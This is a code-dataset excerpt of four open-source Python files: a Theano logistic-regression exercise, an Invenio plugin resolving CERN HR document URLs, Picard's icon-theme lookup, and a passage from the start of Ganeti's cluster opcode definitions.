repo_name
stringlengths
5
104
path
stringlengths
4
248
content
stringlengths
102
99.9k
AthenaYe/UFLDL_Tutorial
Chap1_Supervised_Learning_and_Optimization/logistic_regression.py
#!/usr/bin/env python2.7 # -*- coding:utf-8 -*- import sklearn.datasets as skds import numpy as np import random import theano.tensor as T import theano import matplotlib.pyplot as plt import math #I don't know what the jesus 'housing.data' means so I used self-generated dataset x = np.arange(-50., 50., 1) y = np.array(map(lambda tmp: 1.0/(1 + math.exp(-3 * tmp + 5.0)), x)) noise = np.random.uniform(-0.1, .1, size=len(x)) y += noise print x print y #declarations theta = theano.shared(np.random.uniform(-0.1, 0.1)) omega = theano.shared(np.random.uniform(-0.1, 0.1)) X = T.dscalar('X') Y = T.dscalar('Y') #functions prediction = 1/(1 + T.exp(-omega * X + theta)) loss1 = -Y * T.log(prediction) loss2 = 1/2.0 * (prediction - Y) ** 2 predict = theano.function([X], prediction) calculate_loss = theano.function([X, Y], loss2) print predict(1.0) #derivatives dX = T.grad(loss2, X) dtheta = T.grad(loss2, theta) domega = T.grad(loss2, omega) epsilon = .01 #gradient function gradient_step = theano.function( [X, Y], updates=((omega, omega - epsilon * domega), (theta, theta - epsilon * dtheta))) #optimization for i in range(100): loss = 0 for j in range(len(x)): gradient_step(x[j], y[j]) loss += calculate_loss(x[j], y[j]) print 'loss after' + str(i) + 'iterations.' + str(loss) print x print y mul = 1 - 1/len(x) plt.xlim(x.min() * mul, x.max() * mul) plt.ylim(y.min() * mul, y.max() * mul) plt.xlabel('x') plt.ylabel('y') plt.title('lr test') plt.plot(x, y, 'ro') xx = np.arange(x.min(), x.max(), 0.1) yy = map(lambda abc: predict(abc), xx) plt.plot(xx, yy, 'b') plt.show() # vim: ts=4 sw=4 sts=4 expandtab
PXke/invenio
invenio/modules/redirector/redirect_methods/goto_plugin_cern_hr_documents.py
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2012 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.

"""
This implements a redirection for CERN HR Documents in the CERN Document
Server. It's useful as a reference on how goto plugins could be implemented.
"""

import time
import re

from invenio.legacy.search_engine import perform_request_search
from invenio.legacy.bibrecord import get_fieldvalues
from invenio.legacy.bibdocfile.api import BibRecDocs


def make_cern_ssr_docname(lang, edition, modif=0):
    """Build the docname of a Staff Rules and Regulations document.

    :param lang: document language code (e.g. 'en', 'fr')
    :param edition: edition number (zero-padded to two digits)
    :param modif: optional modification number; when non-zero a
        "_modifNN" suffix is appended
    :return: the docname, e.g. "CERN_SSR_en_ed08_modif03"
    """
    if modif:
        return "CERN_SSR_%(lang)s_ed%(edition)02d_modif%(modif)02d" % {
            'lang': lang,
            'edition': edition,
            'modif': modif
        }
    else:
        return "CERN_SSR_%(lang)s_ed%(edition)02d" % {
            'lang': lang,
            'edition': edition,
        }


_RE_REVISION = re.compile(r"rev(\d\d)")


def _get_revision(docname):
    """
    Return the revision in a docname. E.g.:
    CERN_Circ_Op_en_02_rev01_Implementation measures.pdf -> 1
    CERN_Circ_Op_en_02_rev02_Implementation measures.PDF -> 2

    Docnames without a "revNN" component are treated as revision 0.
    """
    g = _RE_REVISION.search(docname)
    if g:
        return int(g.group(1))
    return 0


def _register_document(documents, docname, key):
    """
    Register in the documents mapping the docname to key, but only if the
    docname has a revision higher of the docname already associated with a key
    """
    if key in documents:
        if _get_revision(docname) > _get_revision(documents[key]):
            documents[key] = docname
    else:
        documents[key] = docname


def _classify_circular_documents(bibrecdocs):
    """Map logical document keys to the highest-revision attached docname.

    Keys are e.g. 'implementation-en', 'archiving-fr', 'annex-en', 'en',
    'fr', matching the 'document' parameters registered by
    L{register_hr_redirections}.

    :param bibrecdocs: a BibRecDocs instance for the circular's record
    :return: dict mapping logical key -> docname

    NOTE(review): this helper replaces two verbatim copies of the same
    loop (OPER-CIRC and ADMIN-CIRC branches of goto()).  Two fixes:
    - 'annexes_en' is tested before 'annexe': the French test 'annexe' is
      a substring of 'annexes_en' and used to shadow it, misfiling English
      annexes under the French key.
    - keys use hyphens ('implementation-en'), as registered by
      register_hr_redirections and as the ADMIN-CIRC branch already did;
      the OPER-CIRC branch previously used underscores and could never
      match the registered 'document' parameter.
    """
    documents = {}
    for docname in bibrecdocs.get_bibdoc_names():
        ldocname = docname.lower()
        if 'implementation' in ldocname:
            _register_document(documents, docname, 'implementation-en')
        elif 'application' in ldocname:
            _register_document(documents, docname, 'implementation-fr')
        elif 'archiving' in ldocname:
            _register_document(documents, docname, 'archiving-en')
        elif 'archivage' in ldocname:
            _register_document(documents, docname, 'archiving-fr')
        elif 'annexes_en' in ldocname:
            _register_document(documents, docname, 'annex-en')
        elif 'annexe' in ldocname:
            ## French spelling; also catches 'annexes_fr'
            _register_document(documents, docname, 'annex-fr')
        elif 'annex' in ldocname:
            ## English spelling, only reached when the French form didn't match
            _register_document(documents, docname, 'annex-en')
        elif '_en_' in ldocname or '_eng_' in ldocname or '_angl_' in ldocname:
            _register_document(documents, docname, 'en')
        elif '_fr_' in ldocname:
            _register_document(documents, docname, 'fr')
    return documents


def goto(type, document='', number=0, lang='en', modif=0):
    """Resolve an HR document redirection to the URL of the target PDF.

    :param type: one of 'SSR', 'OPER-CIRC', 'ADMIN-CIRC'
    :param document: logical document key for circulars (e.g. 'en',
        'annex-fr'); ignored for 'SSR'
    :param number: circular number; ignored for 'SSR'
    :param lang: language of the SSR document; ignored for circulars
    :param modif: SSR modification number; ignored for circulars
    :return: URL of the matching PDF file
    """
    today = time.strftime('%Y-%m-%d')
    if type == 'SSR':
        ## We would like a CERN Staff Rules and Regulations
        recids = perform_request_search(
            cc='Staff Rules and Regulations',
            f="925__a:1996-01-01->%s 925__b:%s->9999-99-99" % (today, today))
        recid = recids[-1]
        reportnumber = get_fieldvalues(recid, '037__a')[0]
        edition = int(reportnumber[-2:])  ## e.g. CERN-STAFF-RULES-ED08
        return BibRecDocs(recid).get_bibdoc(
            make_cern_ssr_docname(lang, edition, modif)).get_file(
                '.pdf').get_url()
    elif type == "OPER-CIRC":
        recids = perform_request_search(
            cc="Operational Circulars",
            p="reportnumber=\"CERN-OPER-CIRC-%s-*\"" % number,
            sf="925__a")
        recid = recids[-1]
        bibrecdocs = BibRecDocs(recid)
        documents = _classify_circular_documents(bibrecdocs)
        return bibrecdocs.get_bibdoc(
            documents[document]).get_file('.pdf').get_url()
    elif type == 'ADMIN-CIRC':
        recids = perform_request_search(
            cc="Administrative Circulars",
            p="reportnumber=\"CERN-ADMIN-CIRC-%s-*\"" % number,
            sf="925__a")
        recid = recids[-1]
        bibrecdocs = BibRecDocs(recid)
        documents = _classify_circular_documents(bibrecdocs)
        return bibrecdocs.get_bibdoc(
            documents[document]).get_file('.pdf').get_url()


def register_hr_redirections():
    """
    Run this only once
    """
    from invenio.modules.redirector.api import register_redirection
    plugin = 'goto_plugin_cern_hr_documents'
    ## Staff rules and regulations
    for modif in range(1, 20):
        for lang in ('en', 'fr'):
            register_redirection('hr-srr-modif%02d-%s' % (modif, lang), plugin,
                                 parameters={'type': 'SSR', 'lang': lang,
                                             'modif': modif})
    for lang in ('en', 'fr'):
        register_redirection('hr-srr-%s' % lang, plugin,
                             parameters={'type': 'SSR', 'lang': lang,
                                         'modif': 0})
    ## Operational Circulars
    for number in range(1, 10):
        for lang in ('en', 'fr'):
            register_redirection('hr-oper-circ-%s-%s' % (number, lang), plugin,
                                 parameters={'type': 'OPER-CIRC',
                                             'document': lang,
                                             'number': number})
    for number, special_document in ((2, 'implementation'), (2, 'annex'),
                                     (3, 'archiving'), (3, 'annex')):
        for lang in ('en', 'fr'):
            register_redirection(
                'hr-circ-%s-%s-%s' % (number, special_document, lang), plugin,
                parameters={'type': 'OPER-CIRC',
                            'document': '%s-%s' % (special_document, lang),
                            'number': number})
    ## Administrative Circulars:
    for number in range(1, 32):
        for lang in ('en', 'fr'):
            register_redirection('hr-admin-circ-%s-%s' % (number, lang),
                                 plugin,
                                 parameters={'type': 'ADMIN-CIRC',
                                             'document': lang,
                                             'number': number})


if __name__ == "__main__":
    register_hr_redirections()
mineo/picard
picard/util/icontheme.py
# -*- coding: utf-8 -*-
#
# Picard, the next-generation MusicBrainz tagger
# Copyright (C) 2006 Lukáš Lalinský
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.

import os.path
import sys

from PyQt5 import QtGui


if sys.platform == 'win32':
    # Windows ships icons as Qt resources only; no filesystem theme search.
    _search_paths = []
else:
    # Freedesktop-style icon search path.  BUG FIX: XDG_DATA_DIRS is a
    # colon-separated *list* of base directories (XDG Base Directory
    # spec); joining the raw value with 'icons' produced a bogus path
    # whenever more than one directory was configured.  Search the
    # 'icons' subdirectory of every entry instead.
    _search_paths = [os.path.expanduser('~/.icons')]
    _search_paths.extend(
        os.path.join(basedir, 'icons')
        for basedir in os.environ.get('XDG_DATA_DIRS', '/usr/share').split(':')
        if basedir)
    _search_paths.append('/usr/share/pixmaps')

# Name of the active icon theme, detected from the desktop environment at
# import time; None when no theme could be determined.
_current_theme = None
if 'XDG_CURRENT_DESKTOP' in os.environ:
    desktop = os.environ['XDG_CURRENT_DESKTOP'].lower()
    if desktop in ('gnome', 'unity'):
        # gsettings prints the theme quoted; strip the surrounding quotes.
        _current_theme = \
            (os.popen('gsettings get org.gnome.desktop.interface icon-theme')
             .read().strip()[1:-1] or None)
elif os.environ.get('KDE_FULL_SESSION'):
    # NOTE(review): KDE detection only triggers when XDG_CURRENT_DESKTOP
    # is unset, mirroring the original control flow — confirm intended.
    _current_theme = \
        (os.popen("kreadconfig --file kdeglobals --group Icons"
                  " --key Theme --default crystalsvg").read().strip() or None)

ICON_SIZE_MENU = ('16x16',)
ICON_SIZE_TOOLBAR = ('22x22',)
ICON_SIZE_ALL = ('22x22', '16x16')


def lookup(name, size=ICON_SIZE_ALL):
    """Return a QIcon for *name*, preferring the current desktop theme.

    Searches each theme directory's 'actions', 'places' and 'devices'
    subdirectories for a PNG of the first (preferred) size; on a hit, the
    remaining sizes from the same location are added to the icon as well.
    Falls back to the bundled Qt resources (':/images/<size>/<name>.png')
    when no theme icon is found.

    :param name: icon base name without extension
    :param size: tuple of size directory names, most preferred first
    :return: a QtGui.QIcon (possibly with no files if nothing matched)
    """
    icon = QtGui.QIcon()
    if _current_theme:
        for path in _search_paths:
            for subdir in ('actions', 'places', 'devices'):
                fullpath = os.path.join(path, _current_theme, size[0],
                                        subdir, name)
                if os.path.exists(fullpath + '.png'):
                    icon.addFile(fullpath + '.png')
                    for s in size[1:]:
                        icon.addFile(os.path.join(
                            path, _current_theme, s, subdir, name) + '.png')
                    return icon
    for s in size:
        icon.addFile('/'.join([':', 'images', s, name]) + '.png')
    return icon
ekohl/ganeti
lib/opcodes.py
# # # Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011 Google Inc. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA # 02110-1301, USA. """OpCodes module This module implements the data structures which define the cluster operations - the so-called opcodes. Every operation which modifies the cluster state is expressed via opcodes. """ # this are practically structures, so disable the message about too # few public methods: # pylint: disable-msg=R0903 import logging import re import operator from ganeti import constants from ganeti import errors from ganeti import ht # Common opcode attributes #: output fields for a query operation _POutputFields = ("output_fields", ht.NoDefault, ht.TListOf(ht.TNonEmptyString), "Selected output fields") #: the shutdown timeout _PShutdownTimeout = \ ("shutdown_timeout", constants.DEFAULT_SHUTDOWN_TIMEOUT, ht.TPositiveInt, "How long to wait for instance to shut down") #: the force parameter _PForce = ("force", False, ht.TBool, "Whether to force the operation") #: a required instance name (for single-instance LUs) _PInstanceName = ("instance_name", ht.NoDefault, ht.TNonEmptyString, "Instance name") #: Whether to ignore offline nodes _PIgnoreOfflineNodes = ("ignore_offline_nodes", False, ht.TBool, "Whether to ignore offline nodes") #: a required node name (for single-node LUs) _PNodeName = ("node_name", 
ht.NoDefault, ht.TNonEmptyString, "Node name") #: a required node group name (for single-group LUs) _PGroupName = ("group_name", ht.NoDefault, ht.TNonEmptyString, "Group name") #: Migration type (live/non-live) _PMigrationMode = ("mode", None, ht.TOr(ht.TNone, ht.TElemOf(constants.HT_MIGRATION_MODES)), "Migration mode") #: Obsolete 'live' migration mode (boolean) _PMigrationLive = ("live", None, ht.TMaybeBool, "Legacy setting for live migration, do not use") #: Tag type _PTagKind = ("kind", ht.NoDefault, ht.TElemOf(constants.VALID_TAG_TYPES), None) #: List of tag strings _PTags = ("tags", ht.NoDefault, ht.TListOf(ht.TNonEmptyString), None) _PForceVariant = ("force_variant", False, ht.TBool, "Whether to force an unknown OS variant") _PWaitForSync = ("wait_for_sync", True, ht.TBool, "Whether to wait for the disk to synchronize") _PIgnoreConsistency = ("ignore_consistency", False, ht.TBool, "Whether to ignore disk consistency") _PStorageName = ("name", ht.NoDefault, ht.TMaybeString, "Storage name") _PUseLocking = ("use_locking", False, ht.TBool, "Whether to use synchronization") _PNameCheck = ("name_check", True, ht.TBool, "Whether to check name") _PNodeGroupAllocPolicy = \ ("alloc_policy", None, ht.TOr(ht.TNone, ht.TElemOf(constants.VALID_ALLOC_POLICIES)), "Instance allocation policy") _PGroupNodeParams = ("ndparams", None, ht.TMaybeDict, "Default node parameters for group") _PQueryWhat = ("what", ht.NoDefault, ht.TElemOf(constants.QR_VIA_OP), "Resource(s) to query for") _PIpCheckDoc = "Whether to ensure instance's IP address is inactive" #: Do not remember instance state changes _PNoRemember = ("no_remember", False, ht.TBool, "Do not remember the state change") #: Target node for instance migration/failover _PMigrationTargetNode = ("target_node", None, ht.TMaybeString, "Target node for shared-storage instances") #: OP_ID conversion regular expression _OPID_RE = re.compile("([a-z])([A-Z])") #: Utility function for L{OpClusterSetParams} _TestClusterOsList = 
ht.TOr(ht.TNone, ht.TListOf(ht.TAnd(ht.TList, ht.TIsLength(2), ht.TMap(ht.WithDesc("GetFirstItem")(operator.itemgetter(0)), ht.TElemOf(constants.DDMS_VALUES))))) # TODO: Generate check from constants.INIC_PARAMS_TYPES #: Utility function for testing NIC definitions _TestNicDef = ht.TDictOf(ht.TElemOf(constants.INIC_PARAMS), ht.TOr(ht.TNone, ht.TNonEmptyString)) _SUMMARY_PREFIX = { "CLUSTER_": "C_", "GROUP_": "G_", "NODE_": "N_", "INSTANCE_": "I_", } def _NameToId(name): """Convert an opcode class name to an OP_ID. @type name: string @param name: the class name, as OpXxxYyy @rtype: string @return: the name in the OP_XXXX_YYYY format """ if not name.startswith("Op"): return None # Note: (?<=[a-z])(?=[A-Z]) would be ideal, since it wouldn't # consume any input, and hence we would just have all the elements # in the list, one by one; but it seems that split doesn't work on # non-consuming input, hence we have to process the input string a # bit name = _OPID_RE.sub(r"\1,\2", name) elems = name.split(",") return "_".join(n.upper() for n in elems) def RequireFileStorage(): """Checks that file storage is enabled. While it doesn't really fit into this module, L{utils} was deemed too large of a dependency to be imported for just one or two functions. @raise errors.OpPrereqError: when file storage is disabled """ if not constants.ENABLE_FILE_STORAGE: raise errors.OpPrereqError("File storage disabled at configure time", errors.ECODE_INVAL) def RequireSharedFileStorage(): """Checks that shared file storage is enabled. While it doesn't really fit into this module, L{utils} was deemed too large of a dependency to be imported for just one or two functions. @raise errors.OpPrereqError: when shared file storage is disabled """ if not constants.ENABLE_SHARED_FILE_STORAGE: raise errors.OpPrereqError("Shared file storage disabled at" " configure time", errors.ECODE_INVAL) @ht.WithDesc("CheckFileStorage") def _CheckFileStorage(value): """Ensures file storage is enabled if used. 
""" if value == constants.DT_FILE: RequireFileStorage() elif value == constants.DT_SHARED_FILE: RequireSharedFileStorage() return True _CheckDiskTemplate = ht.TAnd(ht.TElemOf(constants.DISK_TEMPLATES), _CheckFileStorage) def _CheckStorageType(storage_type): """Ensure a given storage type is valid. """ if storage_type not in constants.VALID_STORAGE_TYPES: raise errors.OpPrereqError("Unknown storage type: %s" % storage_type, errors.ECODE_INVAL) if storage_type == constants.ST_FILE: RequireFileStorage() return True #: Storage type parameter _PStorageType = ("storage_type", ht.NoDefault, _CheckStorageType, "Storage type") class _AutoOpParamSlots(type): """Meta class for opcode definitions. """ def __new__(mcs, name, bases, attrs): """Called when a class should be created. @param mcs: The meta class @param name: Name of created class @param bases: Base classes @type attrs: dict @param attrs: Class attributes """ assert "__slots__" not in attrs, \ "Class '%s' defines __slots__ when it should use OP_PARAMS" % name assert "OP_ID" not in attrs, "Class '%s' defining OP_ID" % name attrs["OP_ID"] = _NameToId(name) # Always set OP_PARAMS to avoid duplicates in BaseOpCode.GetAllParams params = attrs.setdefault("OP_PARAMS", []) # Use parameter names as slots slots = [pname for (pname, _, _, _) in params] assert "OP_DSC_FIELD" not in attrs or attrs["OP_DSC_FIELD"] in slots, \ "Class '%s' uses unknown field in OP_DSC_FIELD" % name attrs["__slots__"] = slots return type.__new__(mcs, name, bases, attrs) class BaseOpCode(object): """A simple serializable object. This object serves as a parent class for OpCode without any custom field handling. """ # pylint: disable-msg=E1101 # as OP_ID is dynamically defined __metaclass__ = _AutoOpParamSlots def __init__(self, **kwargs): """Constructor for BaseOpCode. The constructor takes only keyword arguments and will set attributes on this object based on the passed arguments. 
As such, it means that you should not pass arguments which are not in the __slots__ attribute for this class. """ slots = self._all_slots() for key in kwargs: if key not in slots: raise TypeError("Object %s doesn't support the parameter '%s'" % (self.__class__.__name__, key)) setattr(self, key, kwargs[key]) def __getstate__(self): """Generic serializer. This method just returns the contents of the instance as a dictionary. @rtype: C{dict} @return: the instance attributes and their values """ state = {} for name in self._all_slots(): if hasattr(self, name): state[name] = getattr(self, name) return state def __setstate__(self, state): """Generic unserializer. This method just restores from the serialized state the attributes of the current instance. @param state: the serialized opcode data @type state: C{dict} """ if not isinstance(state, dict): raise ValueError("Invalid data to __setstate__: expected dict, got %s" % type(state)) for name in self._all_slots(): if name not in state and hasattr(self, name): delattr(self, name) for name in state: setattr(self, name, state[name]) @classmethod def _all_slots(cls): """Compute the list of all declared slots for a class. """ slots = [] for parent in cls.__mro__: slots.extend(getattr(parent, "__slots__", [])) return slots @classmethod def GetAllParams(cls): """Compute list of all parameters for an opcode. """ slots = [] for parent in cls.__mro__: slots.extend(getattr(parent, "OP_PARAMS", [])) return slots def Validate(self, set_defaults): """Validate opcode parameters, optionally setting default values. 
@type set_defaults: bool @param set_defaults: Whether to set default values @raise errors.OpPrereqError: When a parameter value doesn't match requirements """ for (attr_name, default, test, _) in self.GetAllParams(): assert test == ht.NoType or callable(test) if not hasattr(self, attr_name): if default == ht.NoDefault: raise errors.OpPrereqError("Required parameter '%s.%s' missing" % (self.OP_ID, attr_name), errors.ECODE_INVAL) elif set_defaults: if callable(default): dval = default() else: dval = default setattr(self, attr_name, dval) if test == ht.NoType: # no tests here continue if set_defaults or hasattr(self, attr_name): attr_val = getattr(self, attr_name) if not test(attr_val): logging.error("OpCode %s, parameter %s, has invalid type %s/value %s", self.OP_ID, attr_name, type(attr_val), attr_val) raise errors.OpPrereqError("Parameter '%s.%s' fails validation" % (self.OP_ID, attr_name), errors.ECODE_INVAL) class OpCode(BaseOpCode): """Abstract OpCode. This is the root of the actual OpCode hierarchy. All clases derived from this class should override OP_ID. @cvar OP_ID: The ID of this opcode. This should be unique amongst all children of this class. @cvar OP_DSC_FIELD: The name of a field whose value will be included in the string returned by Summary(); see the docstring of that method for details). @cvar OP_PARAMS: List of opcode attributes, the default values they should get if not already defined, and types they must match. @cvar WITH_LU: Boolean that specifies whether this should be included in mcpu's dispatch table @ivar dry_run: Whether the LU should be run in dry-run mode, i.e. 
just the check steps @ivar priority: Opcode priority for queue """ # pylint: disable-msg=E1101 # as OP_ID is dynamically defined WITH_LU = True OP_PARAMS = [ ("dry_run", None, ht.TMaybeBool, "Run checks only, don't execute"), ("debug_level", None, ht.TOr(ht.TNone, ht.TPositiveInt), "Debug level"), ("priority", constants.OP_PRIO_DEFAULT, ht.TElemOf(constants.OP_PRIO_SUBMIT_VALID), "Opcode priority"), ] def __getstate__(self): """Specialized getstate for opcodes. This method adds to the state dictionary the OP_ID of the class, so that on unload we can identify the correct class for instantiating the opcode. @rtype: C{dict} @return: the state as a dictionary """ data = BaseOpCode.__getstate__(self) data["OP_ID"] = self.OP_ID return data @classmethod def LoadOpCode(cls, data): """Generic load opcode method. The method identifies the correct opcode class from the dict-form by looking for a OP_ID key, if this is not found, or its value is not available in this module as a child of this class, we fail. @type data: C{dict} @param data: the serialized opcode """ if not isinstance(data, dict): raise ValueError("Invalid data to LoadOpCode (%s)" % type(data)) if "OP_ID" not in data: raise ValueError("Invalid data to LoadOpcode, missing OP_ID") op_id = data["OP_ID"] op_class = None if op_id in OP_MAPPING: op_class = OP_MAPPING[op_id] else: raise ValueError("Invalid data to LoadOpCode: OP_ID %s unsupported" % op_id) op = op_class() new_data = data.copy() del new_data["OP_ID"] op.__setstate__(new_data) return op def Summary(self): """Generates a summary description of this opcode. The summary is the value of the OP_ID attribute (without the "OP_" prefix), plus the value of the OP_DSC_FIELD attribute, if one was defined; this field should allow to easily identify the operation (for an instance creation job, e.g., it would be the instance name). 
""" assert self.OP_ID is not None and len(self.OP_ID) > 3 # all OP_ID start with OP_, we remove that txt = self.OP_ID[3:] field_name = getattr(self, "OP_DSC_FIELD", None) if field_name: field_value = getattr(self, field_name, None) if isinstance(field_value, (list, tuple)): field_value = ",".join(str(i) for i in field_value) txt = "%s(%s)" % (txt, field_value) return txt def TinySummary(self): """Generates a compact summary description of the opcode. """ assert self.OP_ID.startswith("OP_") text = self.OP_ID[3:] for (prefix, supplement) in _SUMMARY_PREFIX.items(): if text.startswith(prefix): return supplement + text[len(prefix):] return text # cluster opcodes class OpClusterPostInit(OpCode): """Post cluster initialization. This opcode does not touch the cluster at all. Its purpose is to run hooks after the cluster has been initialized. """ class OpClusterDestroy(OpCode): """Destroy the cluster. This opcode has no other parameters. All the state is irreversibly lost after the execution of this opcode. """ class OpClusterQuery(OpCode): """Query cluster information.""" class OpClusterVerifyConfig(OpCode): """Verify the cluster config. """ OP_PARAMS = [ ("verbose", False, ht.TBool, None), ("error_codes", False, ht.TBool, None), ("debug_simulate_errors", False, ht.TBool, None), ] class OpClusterVerifyGroup(OpCode): """Run verify on a node group from the cluster. @type skip_checks: C{list} @ivar skip_checks: steps to be skipped from the verify process; this needs to be a subset of L{constants.VERIFY_OPTIONAL_CHECKS}; currently only L{constants.VERIFY_NPLUSONE_MEM} can be passed """ OP_DSC_FIELD = "group_name" OP_PARAMS = [ ("group_name", ht.NoDefault, ht.TNonEmptyString, None), ("skip_checks", ht.EmptyList, ht.TListOf(ht.TElemOf(constants.VERIFY_OPTIONAL_CHECKS)), None), ("verbose", False, ht.TBool, None), ("error_codes", False, ht.TBool, None), ("debug_simulate_errors", False, ht.TBool, None), ] class OpClusterVerifyDisks(OpCode): """Verify the cluster disks. 
Parameters: none Result: a tuple of four elements: - list of node names with bad data returned (unreachable, etc.) - dict of node names with broken volume groups (values: error msg) - list of instances with degraded disks (that should be activated) - dict of instances with missing logical volumes (values: (node, vol) pairs with details about the missing volumes) In normal operation, all lists should be empty. A non-empty instance list (3rd element of the result) is still ok (errors were fixed) but non-empty node list means some node is down, and probably there are unfixable drbd errors. Note that only instances that are drbd-based are taken into consideration. This might need to be revisited in the future. """ class OpClusterRepairDiskSizes(OpCode): """Verify the disk sizes of the instances and fixes configuration mimatches. Parameters: optional instances list, in case we want to restrict the checks to only a subset of the instances. Result: a list of tuples, (instance, disk, new-size) for changed configurations. In normal operation, the list should be empty. @type instances: list @ivar instances: the list of instances to check, or empty for all instances """ OP_PARAMS = [ ("instances", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), None), ] class OpClusterConfigQuery(OpCode): """Query cluster configuration values.""" OP_PARAMS = [ _POutputFields ] class OpClusterRename(OpCode): """Rename the cluster. @type name: C{str} @ivar name: The new name of the cluster. The name and/or the master IP address will be changed to match the new name and its IP address. """ OP_DSC_FIELD = "name" OP_PARAMS = [ ("name", ht.NoDefault, ht.TNonEmptyString, None), ] class OpClusterSetParams(OpCode): """Change the parameters of the cluster. @type vg_name: C{str} or C{None} @ivar vg_name: The new volume group name or None to disable LVM usage. 
""" OP_PARAMS = [ ("vg_name", None, ht.TMaybeString, "Volume group name"), ("enabled_hypervisors", None, ht.TOr(ht.TAnd(ht.TListOf(ht.TElemOf(constants.HYPER_TYPES)), ht.TTrue), ht.TNone), "List of enabled hypervisors"), ("hvparams", None, ht.TOr(ht.TDictOf(ht.TNonEmptyString, ht.TDict), ht.TNone), "Cluster-wide hypervisor parameter defaults, hypervisor-dependent"), ("beparams", None, ht.TOr(ht.TDict, ht.TNone), "Cluster-wide backend parameter defaults"), ("os_hvp", None, ht.TOr(ht.TDictOf(ht.TNonEmptyString, ht.TDict), ht.TNone), "Cluster-wide per-OS hypervisor parameter defaults"), ("osparams", None, ht.TOr(ht.TDictOf(ht.TNonEmptyString, ht.TDict), ht.TNone), "Cluster-wide OS parameter defaults"), ("candidate_pool_size", None, ht.TOr(ht.TStrictPositiveInt, ht.TNone), "Master candidate pool size"), ("uid_pool", None, ht.NoType, "Set UID pool, must be list of lists describing UID ranges (two items," " start and end inclusive)"), ("add_uids", None, ht.NoType, "Extend UID pool, must be list of lists describing UID ranges (two" " items, start and end inclusive) to be added"), ("remove_uids", None, ht.NoType, "Shrink UID pool, must be list of lists describing UID ranges (two" " items, start and end inclusive) to be removed"), ("maintain_node_health", None, ht.TMaybeBool, "Whether to automatically maintain node health"), ("prealloc_wipe_disks", None, ht.TMaybeBool, "Whether to wipe disks before allocating them to instances"), ("nicparams", None, ht.TMaybeDict, "Cluster-wide NIC parameter defaults"), ("ndparams", None, ht.TMaybeDict, "Cluster-wide node parameter defaults"), ("drbd_helper", None, ht.TOr(ht.TString, ht.TNone), "DRBD helper program"), ("default_iallocator", None, ht.TOr(ht.TString, ht.TNone), "Default iallocator for cluster"), ("master_netdev", None, ht.TOr(ht.TString, ht.TNone), "Master network device"), ("reserved_lvs", None, ht.TOr(ht.TListOf(ht.TNonEmptyString), ht.TNone), "List of reserved LVs"), ("hidden_os", None, _TestClusterOsList, "Modify list of 
hidden operating systems. Each modification must have" " two items, the operation and the OS name. The operation can be" " ``%s`` or ``%s``." % (constants.DDM_ADD, constants.DDM_REMOVE)), ("blacklisted_os", None, _TestClusterOsList, "Modify list of blacklisted operating systems. Each modification must have" " two items, the operation and the OS name. The operation can be" " ``%s`` or ``%s``." % (constants.DDM_ADD, constants.DDM_REMOVE)), ] class OpClusterRedistConf(OpCode): """Force a full push of the cluster configuration. """ class OpQuery(OpCode): """Query for resources/items. @ivar what: Resources to query for, must be one of L{constants.QR_VIA_OP} @ivar fields: List of fields to retrieve @ivar filter: Query filter """ OP_PARAMS = [ _PQueryWhat, ("fields", ht.NoDefault, ht.TListOf(ht.TNonEmptyString), "Requested fields"), ("filter", None, ht.TOr(ht.TNone, ht.TListOf), "Query filter"), ] class OpQueryFields(OpCode): """Query for available resource/item fields. @ivar what: Resources to query for, must be one of L{constants.QR_VIA_OP} @ivar fields: List of fields to retrieve """ OP_PARAMS = [ _PQueryWhat, ("fields", None, ht.TOr(ht.TNone, ht.TListOf(ht.TNonEmptyString)), "Requested fields; if not given, all are returned"), ] class OpOobCommand(OpCode): """Interact with OOB.""" OP_PARAMS = [ ("node_names", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), "List of nodes to run the OOB command against"), ("command", None, ht.TElemOf(constants.OOB_COMMANDS), "OOB command to be run"), ("timeout", constants.OOB_TIMEOUT, ht.TInt, "Timeout before the OOB helper will be terminated"), ("ignore_status", False, ht.TBool, "Ignores the node offline status for power off"), ("power_delay", constants.OOB_POWER_DELAY, ht.TPositiveFloat, "Time in seconds to wait between powering on nodes"), ] # node opcodes class OpNodeRemove(OpCode): """Remove a node. @type node_name: C{str} @ivar node_name: The name of the node to remove. 
